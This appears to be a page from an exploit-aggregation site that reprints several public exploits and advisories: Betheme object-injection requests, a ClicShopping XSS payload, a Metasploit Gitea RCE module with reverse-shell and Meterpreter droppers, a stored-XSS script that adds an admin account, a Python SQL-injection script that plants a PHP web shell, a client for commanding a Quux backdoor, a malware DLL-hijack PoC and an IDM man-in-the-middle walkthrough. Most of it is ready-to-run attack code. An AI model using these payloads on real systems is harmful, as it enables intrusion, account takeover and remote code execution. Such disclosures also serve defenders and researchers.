Latest exploits :: CodePwn

<pre><code>RCE Security Advisory https://www.rcesecurity.com 1. ADVISORY INFORMATION ======================= Product: Betheme Vendor URL: https://muffingroup.com/betheme/ Type: Deserialization of Untrusted Data [CWE-502] Date found: 2022-11-02 Date published: 2022-11-18 CVSSv3 Score: 8.8 (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H) CVE: CVE-2022-3861 2. CREDITS ========== This vulnerability was discovered and researched by Julien Ahrens from RCE Security. 3. VERSIONS AFFECTED ==================== BeTheme 26.5.1.4 and below 4. INTRODUCTION =============== Ever since Betheme was just an idea, we knew that it would be different from all other multipurpose WordPress themes we’d tried before. We wanted to build something more than just another WordPress theme, that could easily adapt to any project you need to work on without writing any code. A theme designed from scratch to save your time & help you enjoy your freedom... (from the vendor's homepage) 5. VULNERABILITY DETAILS ======================== The WordPress theme is vulnerable to multiple PHP Object injections when processing input to multiple, privileged Wordpress ajax routes: -mfn_builder_import -> "mfn-items-import" parameter -mfn_builder_import_page -> "mfn-items-import-page" parameter -importdata -> "import" parameter -importsinglepage -> "import" parameter -importfromclipboard -> "import" parameter To successfully exploit this vulnerability, an attacker must be authenticated with at least Wordpress "Contributer" rights. Successful exploits can allow the attacker to execute arbitrary code. 6. PROOF OF CONCEPT =================== To exploit the "mfn_builder_import" ajax action, use: POST /wp-admin/admin-ajax.php HTTP/1.1 Host: localhost Content-Length: 75 Accept: */* X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Accept-Encoding: gzip, deflate Accept-Language: en-GB,en-US;q=0.9,en;q=0.8 Cookie: [your-auth-cookies] Connection: close mfn-builder-nonce=[your-nonce]&action=mfn_builder_import&mfn-items-import=Tzo4OiJzdGRDbGFzcyI6MTp7czozOiJyY2UiO3M6ODoic2VjdXJpdHkiO30= To exploit the "mfn_builder_import_page" ajax action, use: POST /wp-admin/admin-ajax.php HTTP/1.1 Host: localhost Content-Length: 123 Accept: */* X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Accept-Encoding: gzip, deflate Accept-Language: en-GB,en-US;q=0.9,en;q=0.8 Cookie: [your-auth-cookies] Connection: close mfn-builder-nonce=[your-nonce]&action=mfn_builder_import_page&mfn-items-import-page=https://your-remote-payload.com/ To exploit the "importdata" ajax action, use: POST /wp-admin/admin-ajax.php HTTP/1.1 Host: localhost Content-Length: 114 Accept: */* X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Accept-Encoding: gzip, deflate Accept-Language: en-GB,en-US;q=0.9,en;q=0.8 Cookie: [your-auth-cookies] Connection: close mfn-builder-nonce=[your-nonce]&action=importdata&import=Tzo4OiJzdGRDbGFzcyI6MTp7czozOiJyY2UiO3M6ODoic2VjdXJpdHkiO30= To exploit the "importsinglepage" ajax action, use: POST /wp-admin/admin-ajax.php HTTP/1.1 Host: localhost Content-Length: 83 Accept: */* X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Accept-Encoding: gzip, deflate Accept-Language: en-GB,en-US;q=0.9,en;q=0.8 Cookie: [your-auth-cookies] Connection: close mfn-builder-nonce=[your-nonce]&action=importsinglepage&import=https://your-remote-payload.com/ To exploit the "importfromclipboard" ajax action, use: POST /wp-admin/admin-ajax.php HTTP/1.1 Host: localhost Content-Length: 123 Accept: */* X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Accept-Encoding: gzip, deflate Accept-Language: en-GB,en-US;q=0.9,en;q=0.8 Cookie: [your-auth-cookies] Connection: close mfn-builder-nonce=[your-nonce]&action=importfromclipboard&import=Tzo4OiJzdGRDbGFzcyI6MTp7czozOiJyY2UiO3M6ODoic2VjdXJpdHkiO30= 7. SOLUTION =========== Update to version 26.6 8. REPORT TIMELINE ================== 2022-11-01: Discovery of the vulnerability 2022-11-03: CVE requested from Wordfence (CNA) 2022-11-04: Wordfence assigns CVE-2022-3861 2022-11-08: Vendor notification 2022-11-08: Opened up a security support case on envato.com since the vendor usually doesn't respond 2022-11-16: Envato responds stating that the vendor released 26.6 which fixes this vulnerability 2022-11-18: Public disclosure 9. REFERENCES ============= https://github.com/MrTuxracer/advisories </code></pre>

<pre><code>## Title: ClicShopping_V3-Version3.402 XSS-Reflected ## Author: nu11secur1ty ## Date: 11.20.2022 ## Vendor: https://www.clicshopping.org/forum/ ## Software: https://github.com/ClicShopping/ClicShopping_V3/releases/tag/version3_402 ## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/clicshopping.org/2022/ClicShopping_V3 ## Description: The name of an arbitrarily supplied URL parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The attacker can trick users to open a very dangerous link or he can get sensitive information, also he can destroy some components of your system. ## STATUS: HIGH Vulnerability [+] Payload: ```js GET /ClicShopping_V3-version3_402/index.php?Search&AdvancedSearch&bel9c%22onmouseover%3d%22alert(`Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole`)%22style%3d%22position%3aabsolute%3bwidth%3a100%25%3bheight%3a100%25%3btop%3a0%3bleft%3a0%3b%22zgm9j=1 HTTP/1.1 Host: pwnedhost.com Accept-Encoding: gzip, deflate Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Accept-Language: en-US;q=0.9,en;q=0.8 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.107 Safari/537.36 Connection: close Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="107", "Chromium";v="107" Sec-CH-UA-Platform: Windows Sec-CH-UA-Mobile: ?0 ``` ## Reproduce: [href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/clicshopping.org/2022/ClicShopping_V3) ## Proof and Exploit: [href](https://streamable.com/mgbftx) ## Time spent `1:00` </code></pre>

<pre><code>Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2022 Original source: https://malvuln.com/advisory/71a76adeadc7b51218d265771fc2b0d1.txt Contact: malvuln13@gmail.com Media: twitter.com/malvuln Threat: Trojan.Win32.Platinum.gen Vulnerability: Arbitrary Code Execution Description: The malware looks for and executes DLLs in its current directory. Therefore, we can potentially hijack a vuln DLL execute our own code, control and terminate the malware. Once loaded the exploit dll will check if the current directory is "C:\Windows\System32", if not we grab our process ID and terminate. All basic tests were conducted successfully in a virtual machine environment. Family: PlatinumGroup Type: PE32 MD5: 71a76adeadc7b51218d265771fc2b0d1 Vuln ID: MVID-2022-0657 Dropped files: Adobe_Update_Sync.exe Disclosure: 11/18/2022 Exploit/PoC: 1) Compile the following C code as "WTSAPI32.dll" 2) Place the DLL in same directory as the malware 3) Optional - Hide it: attrib +s +h "WTSAPI32.dll" 4) Run the malware #include "windows.h" //By malvuln - November 2022 //Purpose: PWN Platinum Group malware strain MD5: 71a76adeadc7b51218d265771fc2b0d1 //gcc -c WTSAPI32.c -m32 //gcc -shared -o WTSAPI32.dll WTSAPI32.o -m32 /** DISCLAIMER: Author is NOT responsible for any damages whatsoever by using this software or improper malware handling. By using this code you assume and accept all risk implied or otherwise. **/ BOOL APIENTRY DllMain(HINSTANCE hInst, DWORD reason, LPVOID reserved){ switch (reason) { case DLL_PROCESS_ATTACH: MessageBox(NULL, "Platinum Group\nPWNED!!! by Malvuln", "Code Exec PoC", MB_OK); TCHAR buf[MAX_PATH]; if(GetCurrentDirectory(MAX_PATH, buf)) if(strcmp("C:\\Windows\\System32", buf) != 0){ HANDLE handle = OpenProcess(PROCESS_TERMINATE, FALSE, getpid()); if (NULL != handle) { TerminateProcess(handle, 0); CloseHandle(handle); } } break; } return TRUE; } Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM). </code></pre>

<pre><code>## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking prepend Msf::Exploit::Remote::AutoCheck include Msf::Exploit::Remote::HttpClient include Msf::Exploit::Remote::HttpServer include Msf::Exploit::Remote::HTTP::Gitea include Msf::Exploit::CmdStager def initialize(info = {}) super( update_info( info, 'Name' => 'Gitea Git Fetch Remote Code Execution', 'Description' => %q{ This module exploits Git fetch command in Gitea repository migration process that leads to a remote command execution on the system. This vulnerability affect Gitea before 1.16.7 version. }, 'Author' => [ 'wuhan005', # Original PoC 'li4n0', # Original PoC 'krastanoel' # MSF Module ], 'References' => [ ['CVE', '2022-30781'], ['URL', 'https://tttang.com/archive/1607/'] ], 'DisclosureDate' => '2022-05-16', 'License' => MSF_LICENSE, 'Platform' => %w[unix linux win], 'Arch' => ARCH_CMD, 'Privileged' => false, 'Targets' => [ [ 'Unix Command', { 'Platform' => 'unix', 'Arch' => ARCH_CMD, 'Type' => :unix_cmd, 'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_bash' } } ], [ 'Linux Dropper', { 'Platform' => 'linux', 'Arch' => [ARCH_X86, ARCH_X64], 'Type' => :linux_dropper, 'CmdStagerFlavor' => %i[curl wget echo printf], 'DefaultOptions' => { 'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp' } } ], [ 'Windows Command', { 'Platform' => 'win', 'Arch' => ARCH_CMD, 'Type' => :win_cmd, 'DefaultOptions' => { 'PAYLOAD' => 'cmd/windows/powershell_reverse_tcp' } } ], [ 'Windows Dropper', { 'Platform' => 'win', 'Arch' => [ARCH_X86, ARCH_X64], 'Type' => :win_dropper, 'CmdStagerFlavor' => [ 'psh_invokewebrequest' ], 'DefaultOptions' => { 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp', 'CMDSTAGER::URIPATH' => '/payloads' } } ] ], 'DefaultOptions' => { 'WfsDelay' => 30 }, 'DefaultTarget' => 1, 'Notes' => { 'Stability' => [CRASH_SAFE], 'Reliability' => [REPEATABLE_SESSION], 'SideEffects' => [] } ) ) register_options([ Opt::RPORT(3000), OptString.new('USERNAME', [true, 'Username to authenticate with']), OptString.new('PASSWORD', [true, 'Password to use']), OptString.new('URIPATH', [false, 'The URI to use for this exploit', '/']), ]) end def cleanup super return if @uid.nil? || @migrate_repo_created.nil? [@repo_name, @migrate_repo_name].each do |name| res = gitea_remove_repo(repo_path(name)) if res.nil? || res&.code == 200 vprint_warning("Unable to remove repository '#{name}'") elsif res&.code == 404 vprint_warning("Repository '#{name}' not found, possibly already deleted") else vprint_status("Successfully cleanup repository '#{name}'") end end end def check return CheckCode::Safe('USERNAME can\'t be blank') if datastore['username'].blank? v = get_gitea_version gitea_login(datastore['username'], datastore['password']) if Rex::Version.new(v) <= Rex::Version.new('1.16.6') return CheckCode::Appears("Version detected: #{v}") end CheckCode::Safe("Version detected: #{v}") rescue Msf::Exploit::Remote::HTTP::Gitea::Error::UnknownError => e return CheckCode::Unknown(e.message) rescue Msf::Exploit::Remote::HTTP::Gitea::Error::VersionError => e return CheckCode::Detected(e.message) rescue Msf::Exploit::Remote::HTTP::Gitea::Error::CsrfError, Msf::Exploit::Remote::HTTP::Gitea::Error::AuthenticationError => e return CheckCode::Safe(e.message) end def primer [ '/api/v1/version', '/api/v1/settings/api', "/api/v1/repos/#{@migrate_repo_path}", "/api/v1/repos/#{@migrate_repo_path}/pulls", "/api/v1/repos/#{@migrate_repo_path}/topics" ].each { |uri| hardcoded_uripath(uri) } # adding resources end def execute_command(cmd, _opts = {}) if target['Type'] == :win_dropper # Git on Windows will pass the command to `sh.exe` and not `cmd`. # This requires some adjustments: # - Windows environment variables are mapped by `sh.exe`: `%VAR%` becomes `$VAR` # - `cmd` uses `&` to join multiple commands, whereas `sh.exe` uses `&&`. # - Backslashes need to be escaped with `sh.exe` cmd = cmd.gsub(/%(\w+)%/) { "$#{::Regexp.last_match(1)}" }.gsub(/&/) { '&&' }.gsub(/\\/) { '\\\\\\' } end vprint_status("Executing command: #{cmd}") @repo_name = rand_text_alphanumeric(6..15) @migrate_repo_name = rand_text_alphanumeric(6..15) @migrate_repo_path = repo_path(@migrate_repo_name) vprint_status("Creating repository \"#{@repo_name}\"") @uid = gitea_create_repo(@repo_name) vprint_good('Repository created') vprint_status('Migrating repository') clone_url = "http://#{srvhost_addr}:#{srvport}/#{@migrate_repo_path}" auth_token = rand_text_alphanumeric(6..15) @migrate_repo_created = gitea_migrate_repo(@migrate_repo_name, @uid, clone_url, auth_token) @p = cmd rescue Msf::Exploit::Remote::HTTP::Gitea::Error::MigrationError, Msf::Exploit::Remote::HTTP::Gitea::Error::RepositoryError, Msf::Exploit::Remote::HTTP::Gitea::Error::CsrfError => e fail_with(Failure::UnexpectedReply, e.message) end def exploit unless datastore['AutoCheck'] fail_with(Failure::BadConfig, 'USERNAME can\'t be blank') if datastore['username'].blank? gitea_login(datastore['username'], datastore['password']) end start_service primer case target['Type'] when :unix_cmd, :win_cmd execute_command(payload.encoded) when :linux_dropper, :win_dropper datastore['CMDSTAGER::URIPATH'] = "/#{rand_text_alphanumeric(6..15)}" execute_cmdstager(background: true, delay: 1) end rescue Timeout::Error => e fail_with(Failure::TimeoutExpired, e.message) rescue Msf::Exploit::Remote::HTTP::Gitea::Error::CsrfError => e fail_with(Failure::UnexpectedReply, e.message) rescue Msf::Exploit::Remote::HTTP::Gitea::Error::AuthenticationError => e fail_with(Failure::NoAccess, e.message) end def repo_path(name) "#{datastore['username']}/#{name}" end def on_request_uri(cli, req) case req.uri when '/api/v1/version' send_response(cli, '{"version": "1.16.6"}') when '/api/v1/settings/api' data = { max_response_items: 50, default_paging_num: 30, default_git_trees_per_page: 1000, default_max_blob_size: 10485760 } send_response(cli, data.to_json) when "/api/v1/repos/#{@migrate_repo_path}" data = { clone_url: "#{full_uri}#{datastore['username']}/#{@repo_name}", owner: { login: datastore['username'] } } send_response(cli, data.to_json) when "/api/v1/repos/#{@migrate_repo_path}/topics?limit=0&page=1" send_response(cli, '{"topics":[]}') when "/api/v1/repos/#{@migrate_repo_path}/pulls?limit=50&page=1&state=all" data = [ { base: { ref: 'master' }, head: { ref: "--upload-pack=#{@p}", repo: { clone_url: './', owner: { login: 'master' } } }, updated_at: '2001-01-01T05:00:00+01:00', user: {} } ] send_response(cli, data.to_json) when datastore['CMDSTAGER::URIPATH'] super end end end </code></pre>

<pre><code># Exploit Title: Revenue Collection System v1.0 - Authentication Bypass via Stored XSS # Exploit Author: Joe Pollock # Date: November 16, 2022 # Vendor Homepage: https://www.sourcecodester.com/php/14904/rates-system.html # Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/rates.zip # Tested on: Kali Linux, Apache, Mysql # CVE: T.B.C # Vendor: Kapiya # Version: 1.0 # Exploit Description: # Revenue Collection System v1.0 suffers from a Stored Cross-Site Scripting vulnerability allowing an authenticated # client user to add an administrative user account to the application then log in as the newly created admin. To reproduce this exploit, log in as a client user then navigate to the 'Help' functionality (/index.php?page=help). The help functionality is used to contact an administrator by sending a message. Paste the Javascript code below into the 'Your Message' textbox then click 'Send'. When an administrator views this message, an administrative user account will be added to the application with username "admin_new" and password "Test123Test123". Using these credentials, it should now be possible to log in to the application via the administrative login, here: /admin/login.php (Note: change the 'target', 'x_Username', and 'x_Passsword' as required). <script> var target = "http://localhost/rates/admin/usersadd.php"; var req = new XMLHttpRequest(); req.open("GET", target); req.send(); var parser = new DOMParser(); resp = req.responseText var document = parser.parseFromString(resp, "text/html"); var token = document.getElementsByName("token")[0].value; var params = "token="+token+"&t=users&action=insert&&modal=0&x_Fullname=test&x_Username=admin_new&x__Email=test123%40test123.com&x_Passsword=Test123Test123&x_userLevelId=-1"; req.open("POST", target); req.withCredentials = true; req.setRequestHeader("Content-Type", "application/x-www-form-urlencoded"); req.send(params); </script> </code></pre>

<pre><code># Exploit Title: Revenue Collection System v1.0 - RCE via Unauthenticated SQL Injection # Exploit Author: Joe Pollock # Date: November 16, 2022 # Vendor Homepage: https://www.sourcecodester.com/php/14904/rates-system.html # Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/rates.zip # Tested on: Kali Linux, Apache, Mysql # CVE: T.B.C # Vendor: Kapiya # Version: 1.0 # Exploit Description: # Revenue Collection System v1.0 suffers from an unauthenticated SQL Injection Vulnerability, in step1.php, allowing remote attackers to # write a malicious PHP file to disk. The resulting file can then be accessed within the /rates/admin/DBbackup directory. # This script will write the malicious PHP file to disk, issue a user-defined command, then retrieve the result of that command. # Ex: python3 rcsv1.py 10.10.14.2 "ls" import sys, requests def main(): if len(sys.argv) != 3: print("(+) usage: %s <target> <cmd>" % sys.argv[0]) print('(+) eg: %s 192.168.121.103 "ls"' % sys.argv[0]) sys.exit(-1) targetIP = sys.argv[1] cmd = sys.argv[2] s = requests.Session() # Define obscure filename and command parameter to limit exposure and usage of the RCE. FILENAME = "youcantfindme.php" CMDVAR = "ohno" # Define the SQL injection string sqli = """'+UNION+SELECT+"<?php+echo+shell_exec($_GET['%s']);?>","","","","","","","","","","","","","","","",""+INTO+OUTFILE+'/var/www/html/rates/admin/DBbackup/%s'--+-""" % (CMDVAR,FILENAME) # Write the PHP file to disk using the SQL injection vulnerability url1 = "http://%s/rates/index.php?page=step1&proId=%s" % (targetIP,sqli) r1 = s.get(url1) # Execute the user defined command and display the result url2 = "http://%s/rates/admin/DBbackup/%s?%s=%s" % (targetIP,FILENAME,CMDVAR,cmd) r2 = s.get(url2) print(r2.text) if __name__ == '__main__': main() </code></pre>

<pre><code>Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2022 Original source: https://malvuln.com/advisory/13ce53de9ca4c4e6c58f990b442cb419.txt Contact: malvuln13@gmail.com Media: twitter.com/malvuln Threat: Backdoor.Win32.Quux Vulnerability: Weak Hardcoded Credentials Family: Quux Type: PE32 MD5: 13ce53de9ca4c4e6c58f990b442cb419 Vuln ID: MVID-2022-0656 Dropped files: quux32.exe Disclosure: 11/15/2022 Description: The malware listens on TCP port 3. Authentication is required, however the password "Faraon" translated from Romanian as "Pharaoh" is weak and hardcoded in cleartext within the PE file. Third-party adversaries who can reach an infected host can call commands made available by the backdoor. Commands include uploading files and code execution. Theres a need to code a custom client to communicate with the infected host as nc64.exe and telnet send LF characters and will fail authentication when sending credentials containing "\n" etc. Once connected if we send any files they will be written to Windows\System unless calling the "SetCurrDir" commmand. 0040AD24 ; char aFaraon[] 0040AD24 aFaraon db 'Faraon',0 ; DATA XREF _WinMain@16_0+376↑o 0040AD2B align 100h [Commands] SetCurrDir GetCurrDir GetCurrentDirectory Exec GetFile SendFile quit exit shutdown dir CreateFile DeleteFile MessageBox die Exploit/PoC: "quux32_xploit.py" from socket import * import time, sys BANNER=""" ____ ____ ___ ____ __ _ __ / __ \__ ____ ____ __ |_ /|_ | / __/_ __ ___ / /__ (_) /_ / /_/ / // / // /\ \ /_/_ </ __/ / _/ \ \ // _ \/ / _ \/ / __/ \___\_\_,_/\_,_//_\_\/____/____/ /___//_\_\/ .__/_/\___/_/\__/ /_/ By Malvuln MVID-2022-0656 - Nov 2022 """ MALWARE_HOST="" PORT=3 CREDZ="Faraon" def chk_res(s): res="" while True: res += s.recv(512).decode() if "#" in res or "\0" in res or "\n" in res or ":" in res: break return res def auth(): s=socket(AF_INET, SOCK_STREAM) s.connect((MALWARE_HOST, PORT)) #Authenticate s.send(CREDZ.encode()) time.sleep(0.5) return s def upload(the_file): s = auth() PAYLOAD="GetCurrentDirectory" s.send(PAYLOAD.encode()) time.sleep(0.5) print(chk_res(s)) PAYLOAD="SetCurrDir" s.send(PAYLOAD.encode()) time.sleep(0.5) print(chk_res(s)) PAYLOAD="C:\\Users\\Public" s.send(PAYLOAD.encode()) time.sleep(0.5) print(chk_res(s)) PAYLOAD="GetCurrentDirectory" s.send(PAYLOAD.encode()) time.sleep(0.5) print(chk_res(s)) PAYLOAD="SendFile" s.send(PAYLOAD.encode()) time.sleep(0.5) PAYLOAD=the_file s.send(PAYLOAD.encode()) time.sleep(0.5) PAYLOAD="Exec" s.send(PAYLOAD.encode()) time.sleep(0.5) PAYLOAD=the_file s.send(PAYLOAD.encode()) time.sleep(0.5) print(chk_res(s)) print("[+] Uploading: "+the_file) time.sleep(2) s.close() def isIP(ip): try: inet_aton(ip) return True except Exception as e: return False def execute(program): s = auth() PAYLOAD="Exec" s.send(PAYLOAD.encode()) time.sleep(0.5) PAYLOAD=program s.send(PAYLOAD.encode()) time.sleep(0.5) print(chk_res(s)) print("[+] Executing: "+program) def kill_srv(): s = auth() print(chk_res(s)) PAYLOAD="die" s.send(PAYLOAD.encode()) time.sleep(0.5) print("[+] Backdoor terminated!") if __name__=="__main__": print(BANNER) if len(sys.argv) == 3: MALWARE_HOST=sys.argv[1] CMD = sys.argv[2] if isIP(MALWARE_HOST): if CMD=="1": _file=input("[-] File to upload: > ") if _file: upload(_file) else: exit(1) elif CMD=="2": pgm=input("[-] Program to run: > ") if pgm: execute(pgm) else: exit(1) elif CMD=="3": choice=input("[-] Kill server? 1=Yes > ") if choice.lower()=="1": kill_srv() else: print("[!] Invalid IP!") exit(1) else: print("[*] QuuX32 Exploit Usage: \n[-]IP: x.x.x.x, Command (1=Upload file, 2=Exec program, 3=Kill server)") exit(1) Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM). </code></pre>

<pre><code># Vulnerability Title: Internet Download Manager v6.41 Build 3 "Remote Code Execution via MITM" Vulnerability # Date: 15.11.2022 # Author: M. Akil Gündoğan # Contact: https://twitter.com/akilgundogan # Vendor Homepage: https://www.internetdownloadmanager.com/ # Software Link: https://mirror2.internetdownloadmanager.com/idman641build3.exe?v=lt&filename=idman641build3.exe # Version: v.6.41 Build 3 # Tested on: Windows 10 Professional x64 # PoC Video: https://youtu.be/0djlanUbfY4 Vulnerabiliy Description: --------------------------------------- Some help files are missing in non-English versions of Internet Download Manager. Help files with the extension ".chm" prepared in the language used are downloaded from the internet and run, and displayed to users. This download is done over HTTP, which is an insecure protocol. An attacker on the local network can spoof traffic with a MITM attack and replaces ".chm" help files with malicious ".chm" files. IDM runs ".chm" files automatically after downloading. This allows the attacker to execute code remotely. It also uses HTTP for checking and downloading updates by IDM. The attacker can send fake updates as if the victim has a new update to the system. Since we preferred to use Turkish IDM, our target address in the MITM attack was "http://www.internetdownloadmanager.com/languages/tut_tr.chm". Requirements: --------------------------------------- The attacker and the victim must be on the same local network. The victim using the computer must have a user account with administrative privileges on the system. The attacker does not need to have administrator privileges! Step by step produce: --------------------------------------- 1 - The attacker prepares a malicious CHM file. You can read the article at "https://sevenlayers.com/index.php/316-malicious-chm" for that. 2 - A MITM attack is made against the target using Ettercap or Bettercap. 3 - Let's redirect the domains "internetdownloadmanager.com" and "*.internetdownloadmanager.com" to our attacker machine with DNS spoofing. 4 - A web server is run on the attacking machine and the languages directory is created and the malicious ".chm" file with the same name (tut_tr.chm / the file according to which language you are using.) is placed in it. 5 - When the victim opens Internet Download Manager and clicks on the "Tutorials" button, the download will start and our malicious ".chm" file will run automatically when it's finished. Advisories: --------------------------------------- Developers should stop using insecure HTTP in their update and download modules. In addition, every downloaded file should not be run automatically, additional warning messages should be displayed for users. Special thanks: p4rs, ratio, blackcode, zeyd.can and all friends. --------------------------------------- </code></pre>